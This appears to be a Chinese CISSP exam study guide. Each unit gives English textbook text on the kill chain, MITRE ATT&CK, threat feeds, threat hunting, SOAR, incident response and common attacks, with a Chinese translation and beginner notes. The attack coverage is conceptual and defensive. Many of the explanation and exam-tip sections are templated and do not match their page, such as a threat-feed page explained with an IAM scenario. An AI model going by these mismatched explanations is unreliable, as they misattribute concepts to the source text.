投递 攻击者通过钓鱼攻击、恶意电子邮件附件、被入侵的网站或其他常见的社会 工程方法将武器发送给目标。 利用。 该武器利用目标系统中的漏洞。 安装。 利用该漏洞的代码随后安装恶意软件。 恶意软件通常包含一个后门,允许攻击者 远程访问 系统。 命令与控制。 攻击者维护一个命令与控制 系统,用于控制目标及其他被入侵的系统。 目标行动。 攻击者执行其原始目标,例如窃取资金、窃取数据、破坏数据, 或安装额外的恶意代码,如勒索软件。 与军事模型类似,目标是通过在攻击的任何阶段阻止攻击者来破坏攻击链。 例 如,如果用户避免了所有社会工程方法,攻击者就无法交付武器,也就无法成 功。 了解MITRE ATT&CK MITRE ATT&CK矩阵(由MITRE创建,可在http://attack.mitre.org查看) 是一个知识库,收录了恶意行为者在各种攻击中使用的已识别战术、技术和程 序(TTPs)。 它与Kill Chain模型(如网络Kill Chain)相辅相成。 然而,与 Kill Chain模型不同的是,MITRE ATT&CK中的战术并非有序的攻击序列, 而是以矩阵形式列出TTPs。

此外,恶意行为者不断修改其攻击方法,因此 ATT&CK矩阵是一个动态文档,至少每年更新两次。 该矩阵包括以下战术: 侦察 资源开发 初始访问 执行 持久性 权限提升

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

程序:程序是一步一步怎么做。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
程序 程序是一步一步怎么做。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 66 / PDF P1203

第 1203 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Defense evasion Credential access Discovery Lateral movement Collection Command and control Exfiltration Impact Each of the tactics includes techniques used by attackers. For example, the Reconnaissance tactic consists of multiple techniques. Clicking any of these takes you to another page describing it, along with mitigation and detection techniques. Some techniques include layers of subtechniques. If you drill down on Reconnaissance, you'll see Vulnerability Scanning under Active Scanning. This documents specific things you can look for to detect unauthorized scans. Chapter 15 covers vulnerability scans and vulnerability scanners in more depth.

Threat Feeds On the Internet, a feed is a steady stream of content that users can scroll through. Users can subscribe to various content, such as news articles, weather, blog content, and more. As an example, Really Simple Syndication (RSS) allows users to subscribe to different content, and a single aggregator collects the content and displays it to users. A threat feed is a steady stream of raw data related to current and potential threats. However, in its raw form, it can be difficult to extract meaningful data. A threat intelligence feed attempts to extract actionable intelligence from the raw data.

Here is some of the information included in a threat intelligence feed: Suspicious domains

中文直译 / 整理

防御规避 凭证访问 发现 横向移动 收集 命令与控制 数据外泄 影响 每种战术都包含攻击者使用的技巧。 例如,侦察战术包含多种技巧。 点击其 中任何一项都会跳转到另一个页面,该页面会详细介绍该技巧,以及相应的 缓解和检测技巧。 某些技巧还包含多层子技巧。 如果你深入查看侦察,你会 在主动扫描下看到漏洞扫描。 这会记录你可以查找的具体内容,以检测未经 授权的扫描。 第15章更深入地探讨了漏洞扫描和漏洞扫描器。 威胁情报源 在互联网上,源是一系列持续不断的内容流,用户可以滚动浏览。 用户可以 订阅各种内容,例如新闻文章、天气、博客内容等。 例如,简单聚合(RSS) 允许用户订阅不同的内容,而一个聚合器会收集这些内容并展示给用户。 威胁情报源是一系列与当前和潜在威胁相关的原始数据流。 然而,以原始形 式呈现时,很难从中提取有意义的信息。 威胁情报源旨在从原始数据中提取 可操作的情报。 以下是威胁情报源中包含的一些信息: 可疑域名

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

漏洞扫描:漏洞扫描用工具找已知弱点。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1203 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

扫描发现弱点,不等于已经成功利用。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
漏洞扫描 漏洞扫描用工具找已知弱点。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 67 / PDF P1204

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Known malware hashes Code shared on internet sites IP addresses linked to malicious activity By comparing data in a threat feed with data going to and from the Internet, security experts can identify potentially malicious traffic. Imagine an attacker stands up a website and uses it to attempt drive-by downloads of new malware. If an organization detects this website's domain name (or IP address) in incoming or outgoing traffic, it is readily apparent that this is malicious and should be investigated. Although it's possible to manually cross-check the data from a threat feed with logs tracking incoming and outgoing traffic, doing so can be quite tedious.

Instead, many organizations use an additional tool to cross-check this data automatically. Some security organizations sell platforms that integrate with threat feeds and automatically provide organizations with the data they need to respond quickly. Threat Hunting Threat hunting is the process of actively searching for cyberthreats in a network. This goes beyond waiting for traditional network tools to detect and report attacks. It starts with the premise that attackers are in the network now, even if none of the preventive and detection controls have detected them and raised warnings. Instead, security professionals aggressively search systems looking for indicators of threats.

As an example, imagine that a threat feed indicates that a botnet has been launching several DDoS attacks recently. It shows the TTPs commonly used to join computers to the botnet. More, it lists the specific things to look for to identify computers joined to this botnet. This might be the existence of specific files or log entries showing specific traffic into or out of the network. Once administrators know what to look for, it becomes a simple matter to craft scripts to look for these files on all internal computers or to send alerts for any network traffic with log entries matching the threat feed information.

Many years ago, attackers often caused damage almost immediately after entering a network. However, many attackers now attempt to remain in a

中文直译 / 整理

已知恶意软件哈希值 在互联网网站上共享的代码 与恶意活动关联的IP地址 通过将威胁情报中的数据与进出互联网的数据进行比对,安全专家可以识别潜 在的恶意流量。 假设攻击者搭建了一个网站,并利用它尝试进行自动下载新型 恶意软件。 如果一个组织在入站或出站流量中检测到该网站的域名(或IP地址), 那么很明显这是恶意行为,应当进行调查。 尽管可以手动将威胁情报的数据与记录入站和出站流量的日志进行交叉核对, 但这样做可能非常繁琐。 因此,许多组织使用额外的工具来自动完成这种数 据交叉核对。 一些安全组织出售与威胁情报集成的平台,自动向组织提供其快速响应所需 的数据。 威胁狩猎 威胁狩猎是主动在网络中搜索网络威胁的过程。 这超越了等待传统网络工具检 测和报告攻击的做法。 其前提是攻击者当前已存在于网络中,即使没有任何预 防和检测控制措施发现并发出警报。 安全专业人员会积极搜索系统,寻找威胁 的迹象。 例如,假设威胁情报指出,一个僵尸网络最近发起了多次DDoS攻击。 它展示 了将计算机加入该僵尸网络时常用的TTPs。 此外,它列出了识别已加入该僵尸 网络的计算机时需要查找的具体内容。

这可能包括特定文件的存在,或显示网 络内外特定流量的日志条目。 一旦管理员知道需要查找什么,便可以轻松编写 脚本,在所有内部计算机上查找这些文件,或对与威胁情报信息匹配的日志条 目触发网络流量警报。 很多年前,攻击者在进入网络后几乎会立即造成破坏。 然而,如今许多攻击者 试图尽可能长时间地潜伏在

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

威胁狩猎:威胁狩猎是在已有迹象或怀疑时主动寻找妥协证据。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Threat modeling 偏预防设计,threat hunting 偏主动发现已存在威胁。

哈希本身不提供机密性;它主要用于完整性校验。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
威胁狩猎 威胁狩猎是在已有迹象或怀疑时主动寻找妥协证据。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 68 / PDF P1205

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

network as long as possible. As an example, APTs often stay undetected in networks for months. There isn't a single method used for threat hunting. However, many methods attempt to analyze the phases of an attack and then look for signs of the attack at individual phases. One popular method of threat hunting is to use a kill chain model. The Intersection of SOAR, Machine Learning, AI, and Threat Feeds These technologies are all advancing rapidly, and things are likely to continue improving. As they do so, it is important to see how these concepts are intertwined. Think of SOAR technologies.

These include playbooks that are the written guidelines administrators use to verify and respond to incidents. Personnel then implement these guidelines in runbooks that implement the guidelines. Strictly speaking, these are not using machine learning or AI because someone must implement the guidelines, and the systems don't deviate from these rules. However, computers are great at performing repetitive steps and eliminating human errors, so they are welcomed by most administrators. IDPSs often send out false positives (an alert indicating a problem where none exists).

After implementing SOAR technologies, they will automatically deal with these false positives using the same guidelines documented in the playbook. Of course, the danger arises when an IDPS has false negatives (indicating a problem that has gone undetected by the IDPS). One way to avoid this is to keep IDPSs informed of new threats. Enter threat feeds. If the SOAR technologies can receive and process the threat feeds, they can ensure all prevention and detection systems know about new threats and automatically respond to them. Compatible threat feeds can keep systems updated in real time. When a threat feed reports a suspicious domain (website), firewalls can immediately block access to it.

When new malware hashes are known, IDPSs can monitor incoming traffic looking for these hashes. Many companies claim that their security solutions leverage machine learning and AI. However, many of their methods are proprietary, so we can't see them. It could be that their systems are using these advanced techniques. They could also have a team of dedicated professionals working around the

中文直译 / 整理

网络中。 例如,高级持续性威胁(APT)通常能在网络中潜伏数月而不被发现。 没有一种单一的方法用于威胁狩猎。 然而,许多方法试图分析攻击的各个阶段, 然后在各个阶段寻找攻击的迹象。 一种流行的威胁狩猎方法是使用杀伤链模型。 SOAR、机器学习、人工智能和威胁情报的交汇 这些技术都在迅速发展,未来有望持续改进。 在此过程中,了解这些概念之间 的相互联系至关重要。 考虑SOAR技术。 这些技术包括剧本,即管理员用于验证和响应事件的书面指 南。 人员随后在运行手册中实施这些指南。 严格来说,这些并不使用机器学习 或人工智能,因为必须由人为实施这些指南,系统也不会偏离这些规则。 然而, 计算机擅长执行重复性步骤并消除人为错误,因此受到大多数管理员的欢迎。 IDPS经常产生误报(即在不存在问题时发出警报)。 在实施SOAR技术后,它 们将使用剧本中记录的相同指南自动处理这些误报。 当然,当IDPS出现漏报 (即未能检测到实际存在的问题)时,危险便会出现。 避免这种情况的一种方 法是让IDPS及时了解新的威胁。 输入威胁情报。 如果SOAR技术能够接收和处理威胁情报,它们可以确保所 有预防和检测系统知晓新威胁并自动做出响应。

兼容的威胁情报可使系统实 时更新。 当威胁情报报告可疑域名(网站)时,防火墙可以立即阻止对该域 名的访问。 当已知新的恶意软件哈希值时,IDPS可以监控传入流量以查找这 些哈希值。 许多公司声称其安全解决方案利用了机器学习和人工智能。 然而,他们的许多 方法都是专有的,因此我们无法看到它们。 他们的系统可能正在使用这些先进 技术。 他们也可能拥有一支专业的团队全天候工作,

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

指南:指南是建议做法,不一定强制。

威胁狩猎:威胁狩猎是在已有迹象或怀疑时主动寻找妥协证据。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Recommended、not compulsory 常对应 guideline。

Threat modeling 偏预防设计,threat hunting 偏主动发现已存在威胁。

哈希本身不提供机密性;它主要用于完整性校验。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
威胁狩猎 威胁狩猎是在已有迹象或怀疑时主动寻找妥协证据。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 69 / PDF P1206

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

clock, identifying threats and manually creating runbooks to detect and mitigate the threats. Either way, SOAR technologies are constantly improving and reducing the workload of administrators. Summary The CISSP Security Operations domain lists several specific incident management steps. Detection is the first step and can come from automated tools or employee observations. Personnel investigate alerts to determine whether an actual incident has occurred, and if so, the next step is a response. Containment of the incident is essential during the mitigation stage. It's also important to protect any evidence during all stages of incident management.

Reporting may be required based on governing laws or an organization's security policy. In the recovery stage, the system is restored to full operation, and it's important to ensure that it is restored to at least as secure a state as it was before the attack. The remediation stage includes a root cause analysis and will often include recommendations to prevent a reoccurrence. Last, the lessons learned stage examines the incident and the response to determine whether there are any lessons to be learned. Preventive and detection measures help prevent security incidents and detect them if they occur.

This includes basic preventive measures such as keeping systems and applications up-to-date with current patches, removing or disabling unneeded services and protocols, using intrusion detection and prevention systems, using anti-malware software with up-to-date signatures, and enabling both host-based and network-based firewalls. It also includes using advanced tools such as intrusion detection and prevention systems, honeypots, and honeynets. Logging and monitoring provide overall accountability when combined with effective identification and authentication practices. Logging involves recording events in logs and database files.

Security logs, system logs, application logs, firewall logs, proxy logs, and change management logs are all common log files. Log files include valuable data and should be protected to ensure that they aren't modified, deleted, or corrupted. If they are not protected, attackers will often try to modify or delete them, and they will not be admissible as evidence to prosecute an attacker. Automating incident response techniques helps reduce the workload of administrators. These include the use of SOAR technologies, along with machine learning and automated intelligence tools. Using threat intelligence

中文直译 / 整理

识别威胁并手动创建运行手册以检测和缓解威胁。 无论如何,SOAR 技术都在 不断改进,减轻了管理员的工作负担。 摘要 CISSP安全运营领域列出了若干具体的事件管理步骤。 检测是第一步,可由自 动化工具或员工观察发现。 人员需调查警报,以确定是否发生了实际事件; 若 确认发生,则下一步是响应。 在缓解阶段,控制事件至关重要。 在事件管理的 所有阶段,保护证据也同样重要。 根据适用法律或组织的安全政策,可能需要 进行报告。 在恢复阶段,系统将恢复至完全运行状态,且必须确保其恢复至至 少与攻击前同等安全的状态。 补救阶段包括根本原因分析,通常还会提出防止 再次发生的建议。 最后,经验总结阶段将审查事件及响应过程,以确定是否有 可汲取的经验教训。 预防和检测措施有助于防止安全事件的发生,并在事件发生时予以发现。 这包 括基本的预防措施,例如及时为系统和应用程序打上最新补丁、移除或禁用不 必要的服务和协议、使用入侵检测和防御系统、使用具有最新特征库的反恶意 软件,并启用基于主机和基于网络的防火墙。 此外,还包括使用高级工具,如 入侵检测和防御系统、蜜罐和蜜网。 日志记录和监控结合有效的身份识别和认证实践,可提供整体问责性。

日志记 录涉及将事件记录到日志和数据库文件中。 安全日志、系统日志、应用程序日 志、防火墙日志、代理日志和变更管理日志都是常见的日志文件。 日志文件包 含重要数据,应加以保护,以确保其不被修改、删除或损坏。 如果未加以保护, 攻击者通常会尝试修改或删除它们,导致这些日志无法作为起诉攻击者的证据。 自动化事件响应技术有助于减轻管理员的工作负担。 这些技术包括使用 SOAR技术以及机器学习和自动化智能工具。 利用威胁情报

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

问责性:问责性要求能把行为绑定到具体主体。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

问责依赖识别、认证、授权、审计和记账共同工作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
问责性 问责性要求能把行为绑定到具体主体。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 70 / PDF P1207

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

helps find threats within a network before traditional security tools locate them. Study Essentials List and describe incident management steps. The CISSP Security Operations domain lists incident management steps as detection, response, mitigation, reporting, recovery, remediation, and lessons learned. After detecting and verifying an incident, the first response is to limit or contain the scope of the incident while protecting evidence. Based on governing laws, an organization may need to report an incident to official authorities, and if PII is affected, individuals need to be informed.

The remediation and lessons learned stages include root cause analysis to determine the cause and recommend solutions to prevent a reoccurrence. Understand basic preventive measures. Basic preventive measures can prevent many incidents from occurring. These include keeping systems up-todate, removing or disabling unneeded protocols and services, using intrusion detection and prevention systems, using anti-malware software with up-todate signatures, and enabling both host-based and network-based firewalls. Know the difference between whitelisting and blacklisting. Software whitelists provide a list of approved software and prevent the installation of any other software not on the list.

Blacklists provide a list of unapproved software and prevent the installation of any software on the list. Understand sandboxing. Sandboxing provides an isolated environment and prevents code running in a sandbox from interacting with elements outside of a sandbox. Know about third-party provided security services. Third-party security services help an organization augment security services provided by internal employees. Many organizations use cloud-based solutions to augment their internal security. Know about denial-of-service (DoS) attacks. DoS attacks prevent a system from responding to legitimate requests for service.

A common DoS attack is the SYN flood attack, which disrupts the TCP three-way handshake. Even though older attacks are not as common today because basic precautions block them, you still need to know them because many newer attacks are often variations on older methods. Smurf attacks employ an amplification network to send numerous response packets to a victim. Ping-

中文直译 / 整理

可在传统安全工具发现威胁之前,在网络中识别出威胁。 学习必备 列出并描述事件管理步骤。 CISSP安全运营领域将事件管理步骤列为检测、响应、 缓解、报告、恢复、整改和经验总结。 在检测并验证事件后,第一步是限制或控 制事件的范围,同时保护证据。 根据适用法律,组织可能需要向官方机构报告事 件; 如果涉及个人身份信息(PII),则需通知相关个人。 整改和经验总结阶段 包括根本原因分析,以确定原因并提出防止再次发生的解决方案。 了解基本的预防措施。 基本的预防措施可以防止许多事件的发生。 这些措施包括 保持系统更新、移除或禁用不必要的协议和服务、使用入侵检测和预防系统、使 用带有最新特征库的反恶意软件,以及启用基于主机和基于网络的防火墙。 了解白名单和黑名单之间的区别。 软件白名单提供一份经过批准的软件列表,并阻止安装列表之外的任何软件。 黑名单则提供一份未经批准的软件列表,并阻止安装列表中的任何软件。 了解沙箱机制。 沙箱提供一个隔离的环境,防止在沙箱中运行的代码与沙箱外 部的元素交互。 了解第三方提供的安全服务。 第三方安全服务有助于组织增强内部员工提供的 安全服务。 许多组织使用基于云的解决方案来增强其内部安全。

了解拒绝服务(DoS)攻击。 DoS攻击会阻止系统响应合法的服务请求。 一种 常见的DoS攻击是SYN洪水攻击,它破坏了TCP三次握手。 尽管由于基本的防 护措施可以阻止旧式攻击,它们如今已不那么常见,但你仍需了解它们,因为 许多新型攻击往往是旧方法的变种。 Smurf攻击利用放大网络向受害者发送大 量响应数据包。 Ping‑

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

防火墙:防火墙根据规则控制网络流量进出。

身份:身份是主体在系统中的标识。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

身份管理题要区分识别、认证、授权、审计。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
防火墙 防火墙根据规则控制网络流量进出。
身份 身份是主体在系统中的标识。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 71 / PDF P1208

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

of-death attacks send numerous oversized ping packets to the victim, causing the victim to freeze, crash, or reboot. Understand zero-day exploits. A zero-day exploit is an attack that uses a vulnerability that is either unknown to anyone but the attacker or known only to a limited group of people. On the surface, it sounds like you can't protect against an unknown vulnerability, but basic security practices go a long way toward preventing zero-day exploits. Removing or disabling unneeded protocols and services reduces the attack surface, enabling firewalls to block many access points, and using intrusion detection and prevention systems helps detect and block potential attacks.

Additionally, using tools such as honeypots helps protect live networks. Understand man-in-the-middle attacks. A man-in-the-middle attack (sometimes called an on-path attack) occurs when a malicious user is able to gain a logical position between the two endpoints of a communications link. Although it takes a significant amount of sophistication on the part of an attacker to complete a man-in-the middle attack, the amount of data obtained from the attack can be significant. Understand intrusion detection and intrusion prevention. IDSs and IPSs are important detection and preventive measures against attacks.

Know the difference between knowledge-based detection (using a database similar to anti-malware signatures) and behavior-based detection. Behaviorbased detection starts with a baseline to recognize normal behavior and compares activity with the baseline to detect abnormal activity. The baseline can be outdated if the network is modified, so it must be updated when the environment changes. Describe honeypots and honeynets. A honeypot is a system that typically has pseudo flaws and fake data to lure intruders. A honeynet is two or more honeypots in a network.

Administrators can observe attackers’ activity while they are in the honeypot, and as long as attackers are in the honeypot, they are not in the live network. Understand the methods used to block malicious code. Malicious code is thwarted with a combination of tools. The obvious tool is antimalware software with up-to-date definitions installed on each system, at the boundary of the network, and on email servers. However, policies that enforce basic security principles, such as the least privilege principle, prevent regular users from installing potentially malicious software. Additionally, of‑death

中文直译 / 整理

攻击向受害者发送大量超大的ping数据包,导致受害者冻结、崩溃或重启。 了解零日漏洞利用。 零日漏洞利用是一种利用未知漏洞的攻击,该漏洞可能仅 被攻击者知晓,或仅被少数人知晓。 表面上看,似乎无法防范未知漏洞,但基 本的安全实践在防止零日漏洞利用方面能起到很大作用。 移除或禁用不必要的 协议和服务可以减少攻击面,使防火墙能够阻止许多访问点,而使用入侵检测 和预防系统则有助于检测和阻止潜在攻击。 此外,使用蜜罐等工具有助于保护 实时网络。 了解中间人攻击。 中间人攻击(有时称为路径中攻击)发生在恶意用户能够获 得通信链路两端之间逻辑位置时。 尽管攻击者要完成中间人攻击需要相当高的 技术复杂性,但此类攻击所能获取的数据量可能非常大。 了解入侵检测与入侵预防。 入侵检测系统(IDS)和入侵防御系统(IPS)是应 对攻击的重要检测与预防措施。 了解基于知识的检测(使用类似于反恶意软件 签名的数据库)与基于行为的检测之间的区别。 基于行为的检测首先建立一个 基线以识别正常行为,并将活动与基线进行比较以检测异常行为。 如果网络发 生更改,基线可能过时,因此在环境发生变化时必须更新基线。 描述蜜罐和蜜网。

蜜罐是一种通常具有伪漏洞和虚假数据以诱骗入侵者的系统。 蜜网是网络中两个或更多蜜罐的组合。 管理员可以在攻击者处于蜜罐中时观察 其活动,只要攻击者在蜜罐中,他们就不会进入真实网络。 了解用于阻止恶意代码的方法。 恶意代码通过一系列工具得以遏制。 显而易见 的工具是在每个系统、网络边界和邮件服务器上安装具有最新定义的反恶意软 件。 然而,强制执行基本安全原则的策略,例如最小权限原则,可防止普通用 户安装可能具有恶意的软件。 此外,

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
